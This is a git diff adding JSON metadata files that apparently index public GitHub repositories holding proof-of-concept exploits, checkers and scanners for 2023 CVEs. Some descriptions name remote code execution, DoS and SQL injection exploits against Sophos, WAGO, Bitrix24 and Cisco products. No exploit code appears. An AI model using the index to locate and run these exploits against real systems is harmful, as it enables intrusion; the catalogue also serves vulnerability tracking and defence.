0000000000..1b9919f6ea --- /dev/null +++ b/2023/CVE-2023-1498.json @@ -0,0 +1,33 @@ +[ + { + "id": 615981091, + "name": "BugHub", + "full_name": "Decemberus\/BugHub", + "owner": { + "login": "Decemberus", + "id": 104720270, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104720270?v=4", + "html_url": "https:\/\/github.com\/Decemberus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Decemberus\/BugHub", + "description": "CVEHub of CVE-2023-1498 and CVE-2023-1500", + "fork": false, + "created_at": "2023-03-19T09:06:59Z", + "updated_at": "2024-03-09T04:46:13Z", + "pushed_at": "2024-03-09T04:45:27Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-1665.json b/2023/CVE-2023-1665.json new file mode 100644 index 0000000000..de1ad38655 --- /dev/null +++ b/2023/CVE-2023-1665.json @@ -0,0 +1,33 @@ +[ + { + "id": 620322465, + "name": "CVE-2023-1665", + "full_name": "0xsu3ks\/CVE-2023-1665", + "owner": { + "login": "0xsu3ks", + "id": 97468816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97468816?v=4", + "html_url": "https:\/\/github.com\/0xsu3ks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xsu3ks\/CVE-2023-1665", + "description": "CVE-2023-1665 - Twake App", + "fork": false, + "created_at": "2023-03-28T13:07:34Z", + "updated_at": "2023-05-04T13:54:34Z", + "pushed_at": "2023-03-28T13:14:19Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-1671.json b/2023/CVE-2023-1671.json new file mode 100644 index 0000000000..fc11325bc5 --- /dev/null +++ b/2023/CVE-2023-1671.json @@ -0,0 +1,97 @@ +[ + { + "id": 631439804, + "name": "CVE-2023-1671", + "full_name": "ohnonoyesyes\/CVE-2023-1671", + "owner": { + "login": "ohnonoyesyes", + "id": 93457304, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93457304?v=4", + "html_url": "https:\/\/github.com\/ohnonoyesyes", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ohnonoyesyes\/CVE-2023-1671", + "description": "Pre-Auth RCE in Sophos Web Appliance", + "fork": false, + "created_at": "2023-04-23T02:58:17Z", + "updated_at": "2024-03-27T16:23:35Z", + "pushed_at": "2023-04-23T02:59:38Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 632051037, + "name": "CVE-2023-1671-POC", + "full_name": "W01fh4cker\/CVE-2023-1671-POC", + "owner": { + "login": "W01fh4cker", + "id": 101872898, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101872898?v=4", + "html_url": "https:\/\/github.com\/W01fh4cker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/W01fh4cker\/CVE-2023-1671-POC", + "description": "CVE-2023-1671-POC, based on dnslog platform", + "fork": false, + "created_at": "2023-04-24T15:53:42Z", + "updated_at": "2024-08-12T20:31:01Z", + "pushed_at": "2023-04-26T02:40:41Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-1671" + ], + "visibility": "public", + "forks": 3, + "watchers": 18, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 641885483, + "name": "cve-2023-1671", + "full_name": "csffs\/cve-2023-1671", + "owner": { + "login": "csffs", + "id": 108768133, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108768133?v=4", + "html_url": "https:\/\/github.com\/csffs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/csffs\/cve-2023-1671", + "description": "Exploit to cve-2023-1671. So there is a test and exploitation function. The test sends a ping request to the dnslog domain from the vulnerable site. If the ping passes, the vulnerability exists, if it doesn't, then cve-2023-1671 is missing. The exploit function, on the other hand, sends a request with your command to the server.", + "fork": false, + "created_at": "2023-05-17T11:20:27Z", + "updated_at": "2023-05-17T12:03:48Z", + "pushed_at": "2023-05-17T12:03:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-1698.json b/2023/CVE-2023-1698.json new file mode 100644 index 0000000000..1f71d06e47 --- /dev/null +++ b/2023/CVE-2023-1698.json @@ -0,0 +1,95 @@ +[ + { + "id": 692207494, + "name": "CVE-2023-1698", + "full_name": "Chocapikk\/CVE-2023-1698", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2023-1698", + "description": "WAGO Remote Exploit Tool for CVE-2023-1698", + "fork": false, + "created_at": "2023-09-15T20:06:31Z", + "updated_at": "2024-10-01T09:09:48Z", + "pushed_at": "2023-09-15T20:07:07Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 707534264, + "name": "CVE-2023-1698", + "full_name": "deIndra\/CVE-2023-1698", + "owner": { + "login": "deIndra", + "id": 73511417, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73511417?v=4", + "html_url": "https:\/\/github.com\/deIndra", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/deIndra\/CVE-2023-1698", + "description": null, + "fork": false, + "created_at": "2023-10-20T05:40:32Z", + "updated_at": "2023-10-20T05:44:30Z", + "pushed_at": "2023-10-20T05:44:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 707675736, + "name": "WAGO-CVE-2023-1698", + "full_name": "thedarknessdied\/WAGO-CVE-2023-1698", + "owner": { + "login": "thedarknessdied", + "id": 56123966, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56123966?v=4", + "html_url": "https:\/\/github.com\/thedarknessdied", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thedarknessdied\/WAGO-CVE-2023-1698", + "description": "WAGO系统远程代码执行漏洞(CVE-2023-1698)", + "fork": false, + "created_at": "2023-10-20T12:15:39Z", + "updated_at": "2023-11-17T06:55:48Z", + "pushed_at": "2023-10-20T12:55:17Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-1718.json b/2023/CVE-2023-1718.json new file mode 100644 index 0000000000..cd32e7310a --- /dev/null +++ b/2023/CVE-2023-1718.json @@ -0,0 +1,33 @@ +[ + { + "id": 715967658, + "name": "Bitrix24DoS", + "full_name": "jhonnybonny\/Bitrix24DoS", + "owner": { + "login": "jhonnybonny", + "id": 87495218, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87495218?v=4", + "html_url": "https:\/\/github.com\/jhonnybonny", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jhonnybonny\/Bitrix24DoS", + "description": "This Python script is designed to exploit a security vulnerability in Bitrix24, leading to a Denial of Service (DoS) attack. The vulnerability, identified as CVE-2023-1718, allows an attacker to disrupt the normal operation of a Bitrix24 instance.", + "fork": false, + "created_at": "2023-11-08T07:45:54Z", + "updated_at": "2024-03-25T03:34:53Z", + "pushed_at": "2023-11-08T07:51:53Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-1767.json b/2023/CVE-2023-1767.json new file mode 100644 index 0000000000..1bcd5ad3bb --- /dev/null +++ b/2023/CVE-2023-1767.json @@ -0,0 +1,33 @@ +[ + { + "id": 614351510, + "name": "CVE-2023-1767", + "full_name": "weizman\/CVE-2023-1767", + "owner": { + "login": "weizman", + "id": 13243797, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13243797?v=4", + "html_url": "https:\/\/github.com\/weizman", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/weizman\/CVE-2023-1767", + "description": null, + "fork": false, + "created_at": "2023-03-15T12:16:20Z", + "updated_at": "2024-02-20T15:36:28Z", + "pushed_at": "2023-04-20T08:52:47Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-1773.json b/2023/CVE-2023-1773.json new file mode 100644 index 0000000000..29d453f66f --- /dev/null +++ b/2023/CVE-2023-1773.json @@ -0,0 +1,33 @@ +[ + { + "id": 832270686, + "name": "xinhu-v2.3.2", + "full_name": "CTF-Archives\/xinhu-v2.3.2", + "owner": { + "login": "CTF-Archives", + "id": 124352319, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/124352319?v=4", + "html_url": "https:\/\/github.com\/CTF-Archives", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CTF-Archives\/xinhu-v2.3.2", + "description": "信呼 v2.3.2 针对CVE-2023-1773的研究环境", + "fork": false, + "created_at": "2024-07-22T17:07:33Z", + "updated_at": "2024-07-25T05:06:36Z", + "pushed_at": "2024-07-24T07:57:57Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-1829.json b/2023/CVE-2023-1829.json new file mode 100644 index 0000000000..f26ca04f5f --- /dev/null +++ b/2023/CVE-2023-1829.json @@ -0,0 +1,33 @@ +[ + { + "id": 653926630, + "name": "CVE-2023-1829", + "full_name": "lanleft\/CVE-2023-1829", + "owner": { + "login": "lanleft", + "id": 50655448, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50655448?v=4", + "html_url": "https:\/\/github.com\/lanleft", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lanleft\/CVE-2023-1829", + "description": null, + "fork": false, + "created_at": "2023-06-15T03:27:03Z", + "updated_at": "2024-11-15T16:28:48Z", + "pushed_at": "2024-02-28T03:23:27Z", + "stargazers_count": 73, + "watchers_count": 73, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 15, + "watchers": 73, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-1874.json b/2023/CVE-2023-1874.json new file mode 100644 index 0000000000..676703050d --- /dev/null +++ b/2023/CVE-2023-1874.json @@ -0,0 +1,39 @@ +[ + { + "id": 867857150, + "name": "cve-2023-1874", + "full_name": "thomas-osgood\/cve-2023-1874", + "owner": { + "login": "thomas-osgood", + "id": 20747585, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20747585?v=4", + "html_url": "https:\/\/github.com\/thomas-osgood", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thomas-osgood\/cve-2023-1874", + "description": null, + "fork": false, + "created_at": "2024-10-04T21:34:02Z", + "updated_at": "2024-11-19T00:00:59Z", + "pushed_at": "2024-10-04T21:34:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-1874", + "cybersecurity", + "exploit", + "python3", + "wordpress" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-1999.json b/2023/CVE-2023-1999.json new file mode 100644 index 0000000000..52f1b4719e --- /dev/null +++ b/2023/CVE-2023-1999.json @@ -0,0 +1,33 @@ +[ + { + "id": 887214831, + "name": "webp_Android10_r33_CVE-2023-1999", + "full_name": "Pazhanivelmani\/webp_Android10_r33_CVE-2023-1999", + "owner": { + "login": "Pazhanivelmani", + "id": 178174306, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/178174306?v=4", + "html_url": "https:\/\/github.com\/Pazhanivelmani", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pazhanivelmani\/webp_Android10_r33_CVE-2023-1999", + "description": null, + "fork": false, + "created_at": "2024-11-12T11:12:23Z", + "updated_at": "2024-11-12T11:13:54Z", + "pushed_at": "2024-11-12T11:13:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2002.json b/2023/CVE-2023-2002.json new file mode 100644 index 0000000000..8f2d18f021 --- /dev/null +++ b/2023/CVE-2023-2002.json @@ -0,0 +1,33 @@ +[ + { + "id": 628552597, + "name": "CVE-2023-2002", + "full_name": "lrh2000\/CVE-2023-2002", + "owner": { + "login": "lrh2000", + "id": 41988959, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41988959?v=4", + "html_url": "https:\/\/github.com\/lrh2000", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lrh2000\/CVE-2023-2002", + "description": "Linux Bluetooth - Run arbitrary management commands as an unprivileged user", + "fork": false, + "created_at": "2023-04-16T10:05:13Z", + "updated_at": "2024-10-10T03:01:06Z", + "pushed_at": "2023-05-31T16:06:34Z", + "stargazers_count": 83, + "watchers_count": 83, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 83, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20025.json b/2023/CVE-2023-20025.json new file mode 100644 index 0000000000..41b1533d03 --- /dev/null +++ b/2023/CVE-2023-20025.json @@ -0,0 +1,33 @@ +[ + { + "id": 634532370, + "name": "CVE-2023-20025", + "full_name": "lnversed\/CVE-2023-20025", + "owner": { + "login": "lnversed", + "id": 46649884, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46649884?v=4", + "html_url": "https:\/\/github.com\/lnversed", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lnversed\/CVE-2023-20025", + "description": "Cisco r042 research", + "fork": false, + "created_at": "2023-04-30T12:46:16Z", + "updated_at": "2023-09-05T12:15:14Z", + "pushed_at": "2023-04-30T12:48:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20048.json b/2023/CVE-2023-20048.json new file mode 100644 index 0000000000..656b6d56d3 --- /dev/null +++ b/2023/CVE-2023-20048.json @@ -0,0 +1,37 @@ +[ + { + "id": 771806530, + "name": "FuegoTest", + "full_name": "0zer0d4y\/FuegoTest", + "owner": { + "login": "0zer0d4y", + "id": 163229114, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/163229114?v=4", + "html_url": "https:\/\/github.com\/0zer0d4y", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0zer0d4y\/FuegoTest", + "description": "A CLI tool for detecting CVE-2023-20048 vulnerability in Cisco Firepower Management Center.", + "fork": false, + "created_at": "2024-03-14T01:32:41Z", + "updated_at": "2024-03-14T02:00:34Z", + "pushed_at": "2024-03-14T01:59:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cisco-firepower-management-center", + "cve-2023-20048", + "security-tools" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20052.json b/2023/CVE-2023-20052.json new file mode 100644 index 0000000000..81f366f76e --- /dev/null +++ b/2023/CVE-2023-20052.json @@ -0,0 +1,64 @@ +[ + { + "id": 637940882, + "name": "CVE-2023-20052", + "full_name": "nokn0wthing\/CVE-2023-20052", + "owner": { + "login": "nokn0wthing", + "id": 53658504, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53658504?v=4", + "html_url": "https:\/\/github.com\/nokn0wthing", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nokn0wthing\/CVE-2023-20052", + "description": "CVE-2023-20052, information leak vulnerability in the DMG file parser of ClamAV", + "fork": false, + "created_at": "2023-05-08T18:34:02Z", + "updated_at": "2024-08-12T20:31:15Z", + "pushed_at": "2023-05-08T18:42:52Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 27, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 668173510, + "name": "CVE-2023-20052", + "full_name": "cY83rR0H1t\/CVE-2023-20052", + "owner": { + "login": "cY83rR0H1t", + "id": 48300212, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48300212?v=4", + "html_url": "https:\/\/github.com\/cY83rR0H1t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cY83rR0H1t\/CVE-2023-20052", + "description": "CVE-2023-20052 information leak vulnerability in the DMG file parser of ClamAV", + "fork": false, + "created_at": "2023-07-19T07:39:20Z", + "updated_at": "2023-09-10T09:29:38Z", + "pushed_at": "2023-09-10T09:56:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20073.json b/2023/CVE-2023-20073.json new file mode 100644 index 0000000000..a517781c70 --- /dev/null +++ b/2023/CVE-2023-20073.json @@ -0,0 +1,33 @@ +[ + { + "id": 679959255, + "name": "CVE-2023-20073", + "full_name": "RegularITCat\/CVE-2023-20073", + "owner": { + "login": "RegularITCat", + "id": 30820879, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30820879?v=4", + "html_url": "https:\/\/github.com\/RegularITCat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RegularITCat\/CVE-2023-20073", + "description": "PoC based on https:\/\/unsafe[.]sh\/go-173464.html research", + "fork": false, + "created_at": "2023-08-18T02:42:50Z", + "updated_at": "2023-08-19T21:11:24Z", + "pushed_at": "2023-08-18T04:00:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2008.json b/2023/CVE-2023-2008.json new file mode 100644 index 0000000000..34b55fc129 --- /dev/null +++ b/2023/CVE-2023-2008.json @@ -0,0 +1,33 @@ +[ + { + "id": 652665640, + "name": "CVE-2023-2008", + "full_name": "bluefrostsecurity\/CVE-2023-2008", + "owner": { + "login": "bluefrostsecurity", + "id": 4976074, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4976074?v=4", + "html_url": "https:\/\/github.com\/bluefrostsecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bluefrostsecurity\/CVE-2023-2008", + "description": "Proof of concept code for CVE-2023-2008", + "fork": false, + "created_at": "2023-06-12T14:41:53Z", + "updated_at": "2024-09-06T00:15:54Z", + "pushed_at": "2023-06-12T15:04:02Z", + "stargazers_count": 35, + "watchers_count": 35, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 35, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20110.json b/2023/CVE-2023-20110.json new file mode 100644 index 0000000000..b983dbefcb --- /dev/null +++ b/2023/CVE-2023-20110.json @@ -0,0 +1,33 @@ +[ + { + "id": 667012414, + "name": "CVE-2023-20110", + "full_name": "redfr0g\/CVE-2023-20110", + "owner": { + "login": "redfr0g", + "id": 26508085, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26508085?v=4", + "html_url": "https:\/\/github.com\/redfr0g", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/redfr0g\/CVE-2023-20110", + "description": "PoC script for CVE-2023-20110 - Cisco Smart Software Manager On-Prem SQL Injection Vulnerability", + "fork": false, + "created_at": "2023-07-16T10:53:51Z", + "updated_at": "2024-04-20T01:38:50Z", + "pushed_at": "2023-07-16T11:11:33Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 16, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20126.json b/2023/CVE-2023-20126.json new file mode 100644 index 0000000000..7a8908a88e --- /dev/null +++ b/2023/CVE-2023-20126.json @@ -0,0 +1,33 @@ +[ + { + "id": 641832121, + "name": "RancidCrisco", + "full_name": "fullspectrumdev\/RancidCrisco", + "owner": { + "login": "fullspectrumdev", + "id": 132891614, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/132891614?v=4", + "html_url": "https:\/\/github.com\/fullspectrumdev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fullspectrumdev\/RancidCrisco", + "description": "PoC for CVE-2023-20126", + "fork": false, + "created_at": "2023-05-17T08:59:40Z", + "updated_at": "2023-10-05T10:35:56Z", + "pushed_at": "2023-06-20T12:45:45Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 20, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20178.json b/2023/CVE-2023-20178.json new file mode 100644 index 0000000000..21b6327870 --- /dev/null +++ b/2023/CVE-2023-20178.json @@ -0,0 +1,33 @@ +[ + { + "id": 655275412, + "name": "CVE-2023-20178", + "full_name": "Wh04m1001\/CVE-2023-20178", + "owner": { + "login": "Wh04m1001", + "id": 44291883, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44291883?v=4", + "html_url": "https:\/\/github.com\/Wh04m1001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wh04m1001\/CVE-2023-20178", + "description": null, + "fork": false, + "created_at": "2023-06-18T12:22:57Z", + "updated_at": "2024-11-21T06:13:18Z", + "pushed_at": "2023-06-18T12:41:52Z", + "stargazers_count": 92, + "watchers_count": 92, + "has_discussions": false, + "forks_count": 17, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 17, + "watchers": 92, + "score": 0, + "subscribers_count": 6 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20198.json b/2023/CVE-2023-20198.json new file mode 100644 index 0000000000..b51c70e7eb --- /dev/null +++ b/2023/CVE-2023-20198.json @@ -0,0 +1,817 @@ +[ + { + "id": 706041284, + "name": "CVE-2023-20198-checker", + "full_name": "raystr-atearedteam\/CVE-2023-20198-checker", + "owner": { + "login": "raystr-atearedteam", + "id": 143163794, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/143163794?v=4", + "html_url": "https:\/\/github.com\/raystr-atearedteam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/raystr-atearedteam\/CVE-2023-20198-checker", + "description": null, + "fork": false, + "created_at": "2023-10-17T07:35:50Z", + "updated_at": "2023-10-17T07:36:19Z", + "pushed_at": "2023-10-17T07:52:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 706050725, + "name": "CVE-2023-20198", + "full_name": "Atea-Redteam\/CVE-2023-20198", + "owner": { + "login": "Atea-Redteam", + "id": 108491572, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108491572?v=4", + "html_url": "https:\/\/github.com\/Atea-Redteam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Atea-Redteam\/CVE-2023-20198", + "description": "CVE-2023-20198 Checkscript", + "fork": false, + "created_at": "2023-10-17T08:00:18Z", + "updated_at": "2024-04-01T11:30:40Z", + "pushed_at": "2023-10-23T20:19:49Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 17, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 706260017, + "name": "cisco-CVE-2023-20198-tester", + "full_name": "securityphoenix\/cisco-CVE-2023-20198-tester", + "owner": { + "login": "securityphoenix", + "id": 61992902, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61992902?v=4", + "html_url": "https:\/\/github.com\/securityphoenix", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/securityphoenix\/cisco-CVE-2023-20198-tester", + "description": "cisco-CVE-2023-20198-tester ", + "fork": false, + "created_at": "2023-10-17T15:44:01Z", + "updated_at": "2023-10-19T10:01:05Z", + "pushed_at": "2023-10-20T14:43:32Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 706337485, + "name": "Simple-Ansible-for-CVE-2023-20198", + "full_name": "emomeni\/Simple-Ansible-for-CVE-2023-20198", + "owner": { + "login": "emomeni", + "id": 6424128, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6424128?v=4", + "html_url": "https:\/\/github.com\/emomeni", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/emomeni\/Simple-Ansible-for-CVE-2023-20198", + "description": null, + "fork": false, + "created_at": "2023-10-17T18:46:21Z", + "updated_at": "2024-07-17T12:08:22Z", + "pushed_at": "2023-10-17T18:46:32Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 706412262, + "name": "CVE-2023-20198-Checker", + "full_name": "ZephrFish\/CVE-2023-20198-Checker", + "owner": { + "login": "ZephrFish", + "id": 5783068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5783068?v=4", + "html_url": "https:\/\/github.com\/ZephrFish", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZephrFish\/CVE-2023-20198-Checker", + "description": "CVE-2023-20198 & 0Day Implant Scanner", + "fork": false, + "created_at": "2023-10-17T22:41:14Z", + "updated_at": "2024-11-06T11:13:05Z", + "pushed_at": "2023-10-23T00:19:21Z", + "stargazers_count": 31, + "watchers_count": 31, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 31, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 706567964, + "name": "CVE-2023-20198", + "full_name": "JoyGhoshs\/CVE-2023-20198", + "owner": { + "login": "JoyGhoshs", + "id": 36255129, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36255129?v=4", + 